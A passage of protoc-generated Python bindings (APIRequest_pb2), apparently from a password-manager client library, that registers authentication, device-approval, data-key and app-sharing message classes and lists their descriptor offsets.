# @@protoc_insertion_point(class_scope:Authentication.NodeEnforcementAddOrUpdateRequest)
})
_sym_db.RegisterMessage(NodeEnforcementAddOrUpdateRequest)
NodeEnforcementRemoveRequest = _reflection.GeneratedProtocolMessageType('NodeEnforcementRemoveRequest', (_message.Message,), {
'DESCRIPTOR' : _NODEENFORCEMENTREMOVEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.NodeEnforcementRemoveRequest)
})
_sym_db.RegisterMessage(NodeEnforcementRemoveRequest)
ApiRequestByKey = _reflection.GeneratedProtocolMessageType('ApiRequestByKey', (_message.Message,), {
'DESCRIPTOR' : _APIREQUESTBYKEY,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ApiRequestByKey)
})
_sym_db.RegisterMessage(ApiRequestByKey)
MemcacheRequest = _reflection.GeneratedProtocolMessageType('MemcacheRequest', (_message.Message,), {
'DESCRIPTOR' : _MEMCACHEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.MemcacheRequest)
})
_sym_db.RegisterMessage(MemcacheRequest)
MemcacheResponse = _reflection.GeneratedProtocolMessageType('MemcacheResponse', (_message.Message,), {
'DESCRIPTOR' : _MEMCACHERESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.MemcacheResponse)
})
_sym_db.RegisterMessage(MemcacheResponse)
MasterPasswordReentryRequest = _reflection.GeneratedProtocolMessageType('MasterPasswordReentryRequest', (_message.Message,), {
'DESCRIPTOR' : _MASTERPASSWORDREENTRYREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.MasterPasswordReentryRequest)
})
_sym_db.RegisterMessage(MasterPasswordReentryRequest)
DeviceRegistrationRequest = _reflection.GeneratedProtocolMessageType('DeviceRegistrationRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEREGISTRATIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceRegistrationRequest)
})
_sym_db.RegisterMessage(DeviceRegistrationRequest)
DeviceVerificationRequest = _reflection.GeneratedProtocolMessageType('DeviceVerificationRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEVERIFICATIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceVerificationRequest)
})
_sym_db.RegisterMessage(DeviceVerificationRequest)
DeviceVerificationResponse = _reflection.GeneratedProtocolMessageType('DeviceVerificationResponse', (_message.Message,), {
'DESCRIPTOR' : _DEVICEVERIFICATIONRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceVerificationResponse)
})
_sym_db.RegisterMessage(DeviceVerificationResponse)
DeviceApprovalRequest = _reflection.GeneratedProtocolMessageType('DeviceApprovalRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEAPPROVALREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceApprovalRequest)
})
_sym_db.RegisterMessage(DeviceApprovalRequest)
DeviceApprovalResponse = _reflection.GeneratedProtocolMessageType('DeviceApprovalResponse', (_message.Message,), {
'DESCRIPTOR' : _DEVICEAPPROVALRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceApprovalResponse)
})
_sym_db.RegisterMessage(DeviceApprovalResponse)
ApproveDeviceRequest = _reflection.GeneratedProtocolMessageType('ApproveDeviceRequest', (_message.Message,), {
'DESCRIPTOR' : _APPROVEDEVICEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ApproveDeviceRequest)
})
_sym_db.RegisterMessage(ApproveDeviceRequest)
EnterpriseUserAliasRequest = _reflection.GeneratedProtocolMessageType('EnterpriseUserAliasRequest', (_message.Message,), {
'DESCRIPTOR' : _ENTERPRISEUSERALIASREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.EnterpriseUserAliasRequest)
})
_sym_db.RegisterMessage(EnterpriseUserAliasRequest)
EnterpriseUserAddAliasRequest = _reflection.GeneratedProtocolMessageType('EnterpriseUserAddAliasRequest', (_message.Message,), {
'DESCRIPTOR' : _ENTERPRISEUSERADDALIASREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.EnterpriseUserAddAliasRequest)
})
_sym_db.RegisterMessage(EnterpriseUserAddAliasRequest)
Device = _reflection.GeneratedProtocolMessageType('Device', (_message.Message,), {
'DESCRIPTOR' : _DEVICE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.Device)
})
_sym_db.RegisterMessage(Device)
RegisterDeviceDataKeyRequest = _reflection.GeneratedProtocolMessageType('RegisterDeviceDataKeyRequest', (_message.Message,), {
'DESCRIPTOR' : _REGISTERDEVICEDATAKEYREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RegisterDeviceDataKeyRequest)
})
_sym_db.RegisterMessage(RegisterDeviceDataKeyRequest)
ValidateCreateUserVerificationCodeRequest = _reflection.GeneratedProtocolMessageType('ValidateCreateUserVerificationCodeRequest', (_message.Message,), {
'DESCRIPTOR' : _VALIDATECREATEUSERVERIFICATIONCODEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ValidateCreateUserVerificationCodeRequest)
})
_sym_db.RegisterMessage(ValidateCreateUserVerificationCodeRequest)
ValidateDeviceVerificationCodeRequest = _reflection.GeneratedProtocolMessageType('ValidateDeviceVerificationCodeRequest', (_message.Message,), {
'DESCRIPTOR' : _VALIDATEDEVICEVERIFICATIONCODEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ValidateDeviceVerificationCodeRequest)
})
_sym_db.RegisterMessage(ValidateDeviceVerificationCodeRequest)
SendSessionMessageRequest = _reflection.GeneratedProtocolMessageType('SendSessionMessageRequest', (_message.Message,), {
'DESCRIPTOR' : _SENDSESSIONMESSAGEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SendSessionMessageRequest)
})
_sym_db.RegisterMessage(SendSessionMessageRequest)
GlobalUserAccount = _reflection.GeneratedProtocolMessageType('GlobalUserAccount', (_message.Message,), {
'DESCRIPTOR' : _GLOBALUSERACCOUNT,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GlobalUserAccount)
})
_sym_db.RegisterMessage(GlobalUserAccount)
AccountUsername = _reflection.GeneratedProtocolMessageType('AccountUsername', (_message.Message,), {
'DESCRIPTOR' : _ACCOUNTUSERNAME,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AccountUsername)
})
_sym_db.RegisterMessage(AccountUsername)
SsoServiceProviderRequest = _reflection.GeneratedProtocolMessageType('SsoServiceProviderRequest', (_message.Message,), {
'DESCRIPTOR' : _SSOSERVICEPROVIDERREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SsoServiceProviderRequest)
})
_sym_db.RegisterMessage(SsoServiceProviderRequest)
SsoServiceProviderResponse = _reflection.GeneratedProtocolMessageType('SsoServiceProviderResponse', (_message.Message,), {
'DESCRIPTOR' : _SSOSERVICEPROVIDERRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SsoServiceProviderResponse)
})
_sym_db.RegisterMessage(SsoServiceProviderResponse)
UserSettingRequest = _reflection.GeneratedProtocolMessageType('UserSettingRequest', (_message.Message,), {
'DESCRIPTOR' : _USERSETTINGREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserSettingRequest)
})
_sym_db.RegisterMessage(UserSettingRequest)
ThrottleState = _reflection.GeneratedProtocolMessageType('ThrottleState', (_message.Message,), {
'DESCRIPTOR' : _THROTTLESTATE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ThrottleState)
})
_sym_db.RegisterMessage(ThrottleState)
ThrottleState2 = _reflection.GeneratedProtocolMessageType('ThrottleState2', (_message.Message,), {
'DESCRIPTOR' : _THROTTLESTATE2,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ThrottleState2)
})
_sym_db.RegisterMessage(ThrottleState2)
DeviceInformation = _reflection.GeneratedProtocolMessageType('DeviceInformation', (_message.Message,), {
'DESCRIPTOR' : _DEVICEINFORMATION,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceInformation)
})
_sym_db.RegisterMessage(DeviceInformation)
UserSetting = _reflection.GeneratedProtocolMessageType('UserSetting', (_message.Message,), {
'DESCRIPTOR' : _USERSETTING,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserSetting)
})
_sym_db.RegisterMessage(UserSetting)
UserDataKeyRequest = _reflection.GeneratedProtocolMessageType('UserDataKeyRequest', (_message.Message,), {
'DESCRIPTOR' : _USERDATAKEYREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserDataKeyRequest)
})
_sym_db.RegisterMessage(UserDataKeyRequest)
EnterpriseUserIdDataKeyPair = _reflection.GeneratedProtocolMessageType('EnterpriseUserIdDataKeyPair', (_message.Message,), {
'DESCRIPTOR' : _ENTERPRISEUSERIDDATAKEYPAIR,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.EnterpriseUserIdDataKeyPair)
})
_sym_db.RegisterMessage(EnterpriseUserIdDataKeyPair)
UserDataKey = _reflection.GeneratedProtocolMessageType('UserDataKey', (_message.Message,), {
'DESCRIPTOR' : _USERDATAKEY,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserDataKey)
})
_sym_db.RegisterMessage(UserDataKey)
UserDataKeyResponse = _reflection.GeneratedProtocolMessageType('UserDataKeyResponse', (_message.Message,), {
'DESCRIPTOR' : _USERDATAKEYRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserDataKeyResponse)
})
_sym_db.RegisterMessage(UserDataKeyResponse)
MasterPasswordRecoveryVerificationRequest = _reflection.GeneratedProtocolMessageType('MasterPasswordRecoveryVerificationRequest', (_message.Message,), {
'DESCRIPTOR' : _MASTERPASSWORDRECOVERYVERIFICATIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.MasterPasswordRecoveryVerificationRequest)
})
_sym_db.RegisterMessage(MasterPasswordRecoveryVerificationRequest)
GetSecurityQuestionV3Request = _reflection.GeneratedProtocolMessageType('GetSecurityQuestionV3Request', (_message.Message,), {
'DESCRIPTOR' : _GETSECURITYQUESTIONV3REQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetSecurityQuestionV3Request)
})
_sym_db.RegisterMessage(GetSecurityQuestionV3Request)
GetSecurityQuestionV3Response = _reflection.GeneratedProtocolMessageType('GetSecurityQuestionV3Response', (_message.Message,), {
'DESCRIPTOR' : _GETSECURITYQUESTIONV3RESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetSecurityQuestionV3Response)
})
_sym_db.RegisterMessage(GetSecurityQuestionV3Response)
GetDataKeyBackupV3Request = _reflection.GeneratedProtocolMessageType('GetDataKeyBackupV3Request', (_message.Message,), {
'DESCRIPTOR' : _GETDATAKEYBACKUPV3REQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetDataKeyBackupV3Request)
})
_sym_db.RegisterMessage(GetDataKeyBackupV3Request)
PasswordRules = _reflection.GeneratedProtocolMessageType('PasswordRules', (_message.Message,), {
'DESCRIPTOR' : _PASSWORDRULES,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.PasswordRules)
})
_sym_db.RegisterMessage(PasswordRules)
GetDataKeyBackupV3Response = _reflection.GeneratedProtocolMessageType('GetDataKeyBackupV3Response', (_message.Message,), {
'DESCRIPTOR' : _GETDATAKEYBACKUPV3RESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetDataKeyBackupV3Response)
})
_sym_db.RegisterMessage(GetDataKeyBackupV3Response)
GetPublicKeysRequest = _reflection.GeneratedProtocolMessageType('GetPublicKeysRequest', (_message.Message,), {
'DESCRIPTOR' : _GETPUBLICKEYSREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetPublicKeysRequest)
})
_sym_db.RegisterMessage(GetPublicKeysRequest)
PublicKeyResponse = _reflection.GeneratedProtocolMessageType('PublicKeyResponse', (_message.Message,), {
'DESCRIPTOR' : _PUBLICKEYRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.PublicKeyResponse)
})
_sym_db.RegisterMessage(PublicKeyResponse)
GetPublicKeysResponse = _reflection.GeneratedProtocolMessageType('GetPublicKeysResponse', (_message.Message,), {
'DESCRIPTOR' : _GETPUBLICKEYSRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetPublicKeysResponse)
})
_sym_db.RegisterMessage(GetPublicKeysResponse)
SetEccKeyPairRequest = _reflection.GeneratedProtocolMessageType('SetEccKeyPairRequest', (_message.Message,), {
'DESCRIPTOR' : _SETECCKEYPAIRREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SetEccKeyPairRequest)
})
_sym_db.RegisterMessage(SetEccKeyPairRequest)
AddAppSharesRequest = _reflection.GeneratedProtocolMessageType('AddAppSharesRequest', (_message.Message,), {
'DESCRIPTOR' : _ADDAPPSHARESREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AddAppSharesRequest)
})
_sym_db.RegisterMessage(AddAppSharesRequest)
RemoveAppSharesRequest = _reflection.GeneratedProtocolMessageType('RemoveAppSharesRequest', (_message.Message,), {
'DESCRIPTOR' : _REMOVEAPPSHARESREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RemoveAppSharesRequest)
})
_sym_db.RegisterMessage(RemoveAppSharesRequest)
AppShareAdd = _reflection.GeneratedProtocolMessageType('AppShareAdd', (_message.Message,), {
'DESCRIPTOR' : _APPSHAREADD,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AppShareAdd)
})
_sym_db.RegisterMessage(AppShareAdd)
AppShare = _reflection.GeneratedProtocolMessageType('AppShare', (_message.Message,), {
'DESCRIPTOR' : _APPSHARE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AppShare)
})
_sym_db.RegisterMessage(AppShare)
AddAppClientRequest = _reflection.GeneratedProtocolMessageType('AddAppClientRequest', (_message.Message,), {
'DESCRIPTOR' : _ADDAPPCLIENTREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AddAppClientRequest)
})
_sym_db.RegisterMessage(AddAppClientRequest)
RemoveAppClientsRequest = _reflection.GeneratedProtocolMessageType('RemoveAppClientsRequest', (_message.Message,), {
'DESCRIPTOR' : _REMOVEAPPCLIENTSREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RemoveAppClientsRequest)
})
_sym_db.RegisterMessage(RemoveAppClientsRequest)
AddExternalShareRequest = _reflection.GeneratedProtocolMessageType('AddExternalShareRequest', (_message.Message,), {
'DESCRIPTOR' : _ADDEXTERNALSHAREREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AddExternalShareRequest)
})
_sym_db.RegisterMessage(AddExternalShareRequest)
AppClient = _reflection.GeneratedProtocolMessageType('AppClient', (_message.Message,), {
'DESCRIPTOR' : _APPCLIENT,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AppClient)
})
_sym_db.RegisterMessage(AppClient)
GetAppInfoRequest = _reflection.GeneratedProtocolMessageType('GetAppInfoRequest', (_message.Message,), {
'DESCRIPTOR' : _GETAPPINFOREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetAppInfoRequest)
})
_sym_db.RegisterMessage(GetAppInfoRequest)
AppInfo = _reflection.GeneratedProtocolMessageType('AppInfo', (_message.Message,), {
'DESCRIPTOR' : _APPINFO,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AppInfo)
})
_sym_db.RegisterMessage(AppInfo)
GetAppInfoResponse = _reflection.GeneratedProtocolMessageType('GetAppInfoResponse', (_message.Message,), {
'DESCRIPTOR' : _GETAPPINFORESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetAppInfoResponse)
})
_sym_db.RegisterMessage(GetAppInfoResponse)
ApplicationSummary = _reflection.GeneratedProtocolMessageType('ApplicationSummary', (_message.Message,), {
'DESCRIPTOR' : _APPLICATIONSUMMARY,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ApplicationSummary)
})
_sym_db.RegisterMessage(ApplicationSummary)
GetApplicationsSummaryResponse = _reflection.GeneratedProtocolMessageType('GetApplicationsSummaryResponse', (_message.Message,), {
'DESCRIPTOR' : _GETAPPLICATIONSSUMMARYRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetApplicationsSummaryResponse)
})
_sym_db.RegisterMessage(GetApplicationsSummaryResponse)
GetVerificationTokenRequest = _reflection.GeneratedProtocolMessageType('GetVerificationTokenRequest', (_message.Message,), {
'DESCRIPTOR' : _GETVERIFICATIONTOKENREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetVerificationTokenRequest)
})
_sym_db.RegisterMessage(GetVerificationTokenRequest)
GetVerificationTokenResponse = _reflection.GeneratedProtocolMessageType('GetVerificationTokenResponse', (_message.Message,), {
'DESCRIPTOR' : _GETVERIFICATIONTOKENRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetVerificationTokenResponse)
})
_sym_db.RegisterMessage(GetVerificationTokenResponse)
SendShareInviteRequest = _reflection.GeneratedProtocolMessageType('SendShareInviteRequest', (_message.Message,), {
'DESCRIPTOR' : _SENDSHAREINVITEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SendShareInviteRequest)
})
_sym_db.RegisterMessage(SendShareInviteRequest)
TimeLimitedAccessRequest = _reflection.GeneratedProtocolMessageType('TimeLimitedAccessRequest', (_message.Message,), {
'DESCRIPTOR' : _TIMELIMITEDACCESSREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TimeLimitedAccessRequest)
})
_sym_db.RegisterMessage(TimeLimitedAccessRequest)
TimeLimitedAccessResponse = _reflection.GeneratedProtocolMessageType('TimeLimitedAccessResponse', (_message.Message,), {
'DESCRIPTOR' : _TIMELIMITEDACCESSRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TimeLimitedAccessResponse)
})
_sym_db.RegisterMessage(TimeLimitedAccessResponse)
RequestDownloadRequest = _reflection.GeneratedProtocolMessageType('RequestDownloadRequest', (_message.Message,), {
'DESCRIPTOR' : _REQUESTDOWNLOADREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RequestDownloadRequest)
})
_sym_db.RegisterMessage(RequestDownloadRequest)
RequestDownloadResponse = _reflection.GeneratedProtocolMessageType('RequestDownloadResponse', (_message.Message,), {
'DESCRIPTOR' : _REQUESTDOWNLOADRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RequestDownloadResponse)
})
_sym_db.RegisterMessage(RequestDownloadResponse)
Download = _reflection.GeneratedProtocolMessageType('Download', (_message.Message,), {
'DESCRIPTOR' : _DOWNLOAD,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.Download)
})
_sym_db.RegisterMessage(Download)
DeleteUserRequest = _reflection.GeneratedProtocolMessageType('DeleteUserRequest', (_message.Message,), {
'DESCRIPTOR' : _DELETEUSERREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeleteUserRequest)
})
_sym_db.RegisterMessage(DeleteUserRequest)
if _descriptor._USE_C_DESCRIPTORS == False:
DESCRIPTOR._options = None
DESCRIPTOR._serialized_options = b'\n\030com.keepersecurity.protoB\016Authentication'
_SUPPORTEDLANGUAGE._serialized_start=14574
_SUPPORTEDLANGUAGE._serialized_end=14887
_LOGINTYPE._serialized_start=14889
_LOGINTYPE._serialized_end=14979
_DEVICESTATUS._serialized_start=14981
_DEVICESTATUS._serialized_end=15094
_LICENSESTATUS._serialized_start=15096
_LICENSESTATUS._serialized_end=15161
_ACCOUNTTYPE._serialized_start=15163
_ACCOUNTTYPE._serialized_end=15218
_SESSIONTOKENTYPE._serialized_start=15221
_SESSIONTOKENTYPE._serialized_end=15425
_VERSION._serialized_start=15427
_VERSION._serialized_end=15498
_MASTERPASSWORDREENTRYACTIONTYPE._serialized_start=15500
_MASTERPASSWORDREENTRYACTIONTYPE._serialized_end=15555
_LOGINMETHOD._serialized_start=15557
_LOGINMETHOD._serialized_end=15665
_LOGINSTATE._serialized_start=15668
_LOGINSTATE._serialized_end=16123
_ENCRYPTEDDATAKEYTYPE._serialized_start=16125
_ENCRYPTEDDATAKEYTYPE._serialized_end=16232
_PASSWORDMETHOD._serialized_start=16234
_PASSWORDMETHOD._serialized_end=16279
_TWOFACTORPUSHTYPE._serialized_start=16282
_TWOFACTORPUSHTYPE._serialized_end=16467
_TWOFACTORVALUETYPE._serialized_start=16470
_TWOFACTORVALUETYPE._serialized_end=16665
_TWOFACTORCHANNELTYPE._serialized_start=16668
_TWOFACTORCHANNELTYPE._serialized_end=16893
_TWOFACTOREXPIRATION._serialized_start=16896
_TWOFACTOREXPIRATION._serialized_end=17067
_LICENSETYPE._serialized_start=17069
_LICENSETYPE._serialized_end=17133
_OBJECTTYPES._serialized_start=17135
_OBJECTTYPES._serialized_end=17240
_ALTERNATEAUTHENTICATIONTYPE._serialized_start=17242
_ALTERNATEAUTHENTICATIONTYPE._serialized_end=17338
_THROTTLETYPE._serialized_start=17341
_THROTTLETYPE._serialized_end=17623
_REGION._serialized_start=17625
_REGION._serialized_end=17681
_APPLICATIONSHARETYPE._serialized_start=17683
_APPLICATIONSHARETYPE._serialized_end=17751
_TIMELIMITEDACCESSTYPE._serialized_start=17754
_TIMELIMITEDACCESSTYPE._serialized_end=17918
_APIREQUEST._serialized_start=55
_APIREQUEST._serialized_end=231
_APIREQUESTPAYLOAD._serialized_start=233
_APIREQUESTPAYLOAD._serialized_end=339
_TRANSFORM._serialized_start=341
_TRANSFORM._serialized_end=395
_DEVICEREQUEST._serialized_start=397
_DEVICEREQUEST._serialized_end=455
_AUTHREQUEST._serialized_start=457
_AUTHREQUEST._serialized_end=541
_NEWUSERMINIMUMPARAMS._serialized_start=544
_NEWUSERMINIMUMPARAMS._serialized_end=683
_PRELOGINREQUEST._serialized_start=686
_PRELOGINREQUEST._serialized_end=823
_LOGINREQUEST._serialized_start=826
_LOGINREQUEST._serialized_end=1082
_DEVICERESPONSE._serialized_start=1084
_DEVICERESPONSE._serialized_end=1176
_SALT._serialized_start=1178
_SALT._serialized_end=1264
_TWOFACTORCHANNEL._serialized_start=1266
_TWOFACTORCHANNEL._serialized_end=1298
_STARTLOGINREQUEST._serialized_start=1301
_STARTLOGINREQUEST._serialized_end=1655
_LOGINRESPONSE._serialized_start=1658
_LOGINRESPONSE._serialized_end=2175
_SSOUSERINFO._serialized_start=2178
_SSOUSERINFO._serialized_end=2318
_PRELOGINRESPONSE._serialized_start=2321
_PRELOGINRESPONSE._serialized_end=2535
_LOGINASUSERREQUEST._serialized_start=2537
_LOGINASUSERREQUEST._serialized_end=2575
_LOGINASUSERRESPONSE._serialized_start=2577
_LOGINASUSERRESPONSE._serialized_end=2664
_VALIDATEAUTHHASHREQUEST._serialized_start=2667
_VALIDATEAUTHHASHREQUEST._serialized_end=2799
_TWOFACTORCHANNELINFO._serialized_start=2802
_TWOFACTORCHANNELINFO._serialized_end=3066
_TWOFACTORDUOSTATUS._serialized_start=3068
_TWOFACTORDUOSTATUS._serialized_end=3168
_TWOFACTORADDREQUEST._serialized_start=3171
_TWOFACTORADDREQUEST._serialized_end=3370
_TWOFACTORRENAMEREQUEST._serialized_start=3372
_TWOFACTORRENAMEREQUEST._serialized_end=3438
_TWOFACTORADDRESPONSE._serialized_start=3440
_TWOFACTORADDRESPONSE._serialized_end=3501
_TWOFACTORDELETEREQUEST._serialized_start=3503
_TWOFACTORDELETEREQUEST._serialized_end=3548
_TWOFACTORLISTRESPONSE._serialized_start=3550
_TWOFACTORLISTRESPONSE._serialized_end=3647
_TWOFACTORUPDATEEXPIRATIONREQUEST._serialized_start=3649
_TWOFACTORUPDATEEXPIRATIONREQUEST._serialized_end=3738
_TWOFACTORVALIDATEREQUEST._serialized_start=3741
_TWOFACTORVALIDATEREQUEST._serialized_end=3942
_TWOFACTORVALIDATERESPONSE._serialized_start=3944
_TWOFACTORVALIDATERESPONSE._serialized_end=4000
_TWOFACTORSENDPUSHREQUEST._serialized_start=4003
_TWOFACTORSENDPUSHREQUEST._serialized_end=4187
_LICENSE._serialized_start=4190
_LICENSE._serialized_end=4321
_OWNERLESSRECORD._serialized_start=4323
_OWNERLESSRECORD._serialized_end=4394
_OWNERLESSRECORDS._serialized_start=4396
_OWNERLESSRECORDS._serialized_end=4472
_USERAUTHREQUEST._serialized_start=4475
_USERAUTHREQUEST._serialized_end=4690
_UIDREQUEST._serialized_start=4692
_UIDREQUEST._serialized_end=4717
_DEVICEUPDATEREQUEST._serialized_start=4720
_DEVICEUPDATEREQUEST._serialized_end=4891
_REGISTERDEVICEINREGIONREQUEST._serialized_start=4894
_REGISTERDEVICEINREGIONREQUEST._serialized_end=5023
_REGISTRATIONREQUEST._serialized_start=5026
_REGISTRATIONREQUEST._serialized_end=5402
_CONVERTUSERTOV3REQUEST._serialized_start=5405
_CONVERTUSERTOV3REQUEST._serialized_end=5613
_REVISIONRESPONSE._serialized_start=5615
_REVISIONRESPONSE._serialized_end=5651
_CHANGEEMAILREQUEST._serialized_start=5653
_CHANGEEMAILREQUEST._serialized_end=5691
_CHANGEEMAILRESPONSE._serialized_start=5693
_CHANGEEMAILRESPONSE._serialized_end=5749
_EMAILVERIFICATIONLINKRESPONSE._serialized_start=5751
_EMAILVERIFICATIONLINKRESPONSE._serialized_end=5805
_SECURITYDATA._serialized_start=5807
_SECURITYDATA._serialized_end=5848
_SECURITYDATAREQUEST._serialized_start=5851
_SECURITYDATAREQUEST._serialized_end=5996
_SECURITYREPORTINCREMENTALDATA._serialized_start=5999
_SECURITYREPORTINCREMENTALDATA._serialized_end=6180
_SECURITYREPORT._serialized_start=6183
_SECURITYREPORT._serialized_end=6428
_SECURITYREPORTSAVEREQUEST._serialized_start=6430
_SECURITYREPORTSAVEREQUEST._serialized_end=6513
_SECURITYREPORTREQUEST._serialized_start=6515
_SECURITYREPORTREQUEST._serialized_end=6556
_SECURITYREPORTRESPONSE._serialized_start=6559
_SECURITYREPORTRESPONSE._serialized_end=6743
_REUSEDPASSWORDSREQUEST._serialized_start=6745
_REUSEDPASSWORDSREQUEST._serialized_end=6784
_SUMMARYCONSOLEREPORT._serialized_start=6786
_SUMMARYCONSOLEREPORT._serialized_end=6848
_CHANGETOKEYTYPEONE._serialized_start=6850
_CHANGETOKEYTYPEONE._serialized_end=6974
_CHANGETOKEYTYPEONEREQUEST._serialized_start=6976
_CHANGETOKEYTYPEONEREQUEST._serialized_end=7067
_CHANGETOKEYTYPEONESTATUS._serialized_start=7069
_CHANGETOKEYTYPEONESTATUS._serialized_end=7154
_CHANGETOKEYTYPEONERESPONSE._serialized_start=7156
_CHANGETOKEYTYPEONERESPONSE._serialized_end=7260
_SETKEY._serialized_start=7262
_SETKEY._serialized_end=7295
_SETKEYREQUEST._serialized_start=7297
_SETKEYREQUEST._serialized_end=7350
_CREATEUSERREQUEST._serialized_start=7353
_CREATEUSERREQUEST._serialized_end=7979
_NODEENFORCEMENTADDORUPDATEREQUEST._serialized_start=7981
_NODEENFORCEMENTADDORUPDATEREQUEST._serialized_end=8068
_NODEENFORCEMENTREMOVEREQUEST._serialized_start=8070
_NODEENFORCEMENTREMOVEREQUEST._serialized_end=8137
_APIREQUESTBYKEY._serialized_start=8140
_APIREQUESTBYKEY._serialized_end=8299
_MEMCACHEREQUEST._serialized_start=8301
_MEMCACHEREQUEST._serialized_end=8347
_MEMCACHERESPONSE._serialized_start=8349
_MEMCACHERESPONSE._serialized_end=8395
_MASTERPASSWORDREENTRYREQUEST._serialized_start=8397
_MASTERPASSWORDREENTRYREQUEST._serialized_end=8516
_DEVICEREGISTRATIONREQUEST._serialized_start=8518
_DEVICEREGISTRATIONREQUEST._serialized_end=8613
_DEVICEVERIFICATIONREQUEST._serialized_start=8616
_DEVICEVERIFICATIONREQUEST._serialized_end=8770
_DEVICEVERIFICATIONRESPONSE._serialized_start=8773
